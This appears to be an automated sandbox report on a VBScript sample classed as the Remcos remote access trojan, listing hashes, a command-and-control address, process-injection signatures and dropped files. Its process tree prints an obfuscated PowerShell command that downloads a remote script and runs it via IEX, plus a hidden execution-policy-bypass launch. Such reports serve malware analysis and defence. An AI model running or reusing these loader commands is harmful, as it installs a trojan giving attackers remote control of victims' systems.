Analysis
- max time kernel: 152s
- max time network: 155s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 21-04-2021 13:20
- Static task: static1
- Behavioral task: behavioral1
- Sample: Appraisa.vbs
- Resource: win7v20210408
General
- Target: Appraisa.vbs
- Size: 662B
- MD5: 2e95d045ff86903502b52f5fd0976aad
- SHA1: c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
- SHA256: dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
- SHA512: 0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df
Malware Config
Extracted
- Family: remcos
- 194.5.97.183:8888
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes:
    flow  pid   process
    6     1220  powershell.exe
    8     1220  powershell.exe
    10    1220  powershell.exe
    12    1220  powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    description                         pid   process         target process
    PID 1060 set thread context of 816  1060  powershell.exe  aspnet_compiler.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
    pid   process
    1220  powershell.exe
    1220  powershell.exe
    1060  powershell.exe
    1060  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  1220  powershell.exe
    Token: SeDebugPrivilege  1060  powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes:
    pid  process
    816  aspnet_compiler.exe
- Suspicious use of WriteProcessMemory (19 IoCs)
  Processes:
    description                       pid   process         target process
    PID 1996 wrote to memory of 1220  1996  WScript.exe     powershell.exe
    PID 1996 wrote to memory of 1220  1996  WScript.exe     powershell.exe
    PID 1996 wrote to memory of 1220  1996  WScript.exe     powershell.exe
    PID 1220 wrote to memory of 1060  1220  powershell.exe  powershell.exe
    PID 1220 wrote to memory of 1060  1220  powershell.exe  powershell.exe
    PID 1220 wrote to memory of 1060  1220  powershell.exe  powershell.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
    PID 1060 wrote to memory of 816   1060  powershell.exe  aspnet_compiler.exe
Processes (child-process depth in brackets)
- [1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisa.vbs"
  - Suspicious use of WriteProcessMemory
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: 4ff6b3014913b3061196d6fb28246928
  SHA1: 720504ad8a352f0451e65e93782c5b13e703724e
  SHA256: ed1689551a0c6f83161b7541e8026dee76f7efe3abe83f970f1bddcbad7a22f6
  SHA512: b63183e88eddaa83caedde4f60619b74c50a7abd294d63347ff5052d35fb8320f66c607bf91c05766fd3aa0f9d00cac84e64a8d7e39ce88aab7720a224d27b5c
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 10479ae2f624cc587efe1b5466dca98b
  SHA1: c82509ea15f7cfbfc2a01e278567827f7d6baff3
  SHA256: a9d4b00114fa4925fb755e98c6434a0d095c4aad2be3de20ded01834eedcd983
  SHA512: 4626e859f8704e73c988fc551c25bc628856297a2d19cf8393aa94e0f9e02c84a97abb907b2138d16ab8758b01ffbe80aefc065173ed3a068d5acb18cdb9e5b1
- C:\Users\Public\ Microsoft.ps1
  MD5: eda0264cc0baa7804ce2a32a99aa9b98
  SHA1: 274b4d04e802370cac624649ea30149dded4e053
  SHA256: 950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f
  SHA512: 43f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74
Memory dumps
- memory/816-87-0x0000000000400000-0x0000000000478000-memory.dmp (Filesize 480KB)
- memory/816-86-0x00000000767B1000-0x00000000767B3000-memory.dmp (Filesize 8KB)
- memory/816-85-0x000000000042EEEF-mapping.dmp
- memory/816-84-0x0000000000400000-0x0000000000478000-memory.dmp (Filesize 480KB)
- memory/1060-71-0x0000000000000000-mapping.dmp
- memory/1060-77-0x000000001ACF0000-0x000000001ACF2000-memory.dmp (Filesize 8KB)
- memory/1060-83-0x00000000027A0000-0x00000000027B8000-memory.dmp (Filesize 96KB)
- memory/1060-78-0x000000001ACF4000-0x000000001ACF6000-memory.dmp (Filesize 8KB)
- memory/1220-67-0x000000001AC54000-0x000000001AC56000-memory.dmp (Filesize 8KB)
- memory/1220-68-0x00000000022C0000-0x00000000022C1000-memory.dmp (Filesize 4KB)
- memory/1220-69-0x000000001AB80000-0x000000001AB81000-memory.dmp (Filesize 4KB)
- memory/1220-66-0x000000001AC50000-0x000000001AC52000-memory.dmp (Filesize 8KB)
- memory/1220-70-0x000000001C8B0000-0x000000001C8B1000-memory.dmp (Filesize 4KB)
- memory/1220-65-0x0000000002560000-0x0000000002561000-memory.dmp (Filesize 4KB)
- memory/1220-64-0x000000001ACD0000-0x000000001ACD1000-memory.dmp (Filesize 4KB)
- memory/1220-63-0x0000000002280000-0x0000000002281000-memory.dmp (Filesize 4KB)
- memory/1220-61-0x0000000000000000-mapping.dmp
- memory/1996-60-0x000007FEFC051000-0x000007FEFC053000-memory.dmp (Filesize 8KB)